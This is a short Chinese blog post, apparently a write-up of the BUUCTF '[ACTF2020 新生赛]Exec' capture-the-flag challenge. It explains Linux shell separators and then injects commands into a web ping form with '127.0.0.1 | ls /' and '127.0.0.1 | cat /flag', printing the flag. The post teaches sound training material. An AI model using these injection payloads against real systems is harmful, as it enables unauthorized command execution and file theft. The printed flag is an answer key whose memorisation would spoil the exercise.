

Web buuctf [ACTF2020 新生赛]Exec1

原创

半杯雨水敬过客 于 2021-08-09 23:54:24 发布 81 收藏

版权声明：本文为博主原创文章，遵循 [CC 4.0 BY-SA](#) 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/weixin_44214568/article/details/119549618

版权

这道题目比较特殊，用了Linux的命令和管道符的知识

先说一下啊管道符：

管道符的作用就是连接命令，将第一个命令的输出作为第二个命令的输入

一共四种“|”，就是按位或，直接执行|后面的语句

“||”，逻辑或，如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句

“&”，按位与，&前面和后面命令都要执行，无论前面真假

“&&”，逻辑与，如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令

“;”，linux下有的，和&一样的作用

然后Linux，我学的就不太好，就不多说了



PING

请输入需要ping的地址

PING

https://blog.csdn.net/weixin_44214568

先输入host ip 127.0.0.1

PING

请输入需要ping的地址

PING

PING 127.0.0.1 (127.0.0.1): 56 data bytes

https://blog.csdn.net/weixin_44214568

这样看就要读取后台服务器的数据

127.0.0.1 | ls /

PING

127.0.0.1 | ls /

PING

```
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```

https://blog.csdn.net/weixin_44214568

读取flag里的数据

127.0.0.1 | cat /flag

PING

127.0.0.1 | cat /flag

PING

flag{4fadd937-120f-493c-8104-4994ca435401}

https://blog.csdn.net/weixin_44214568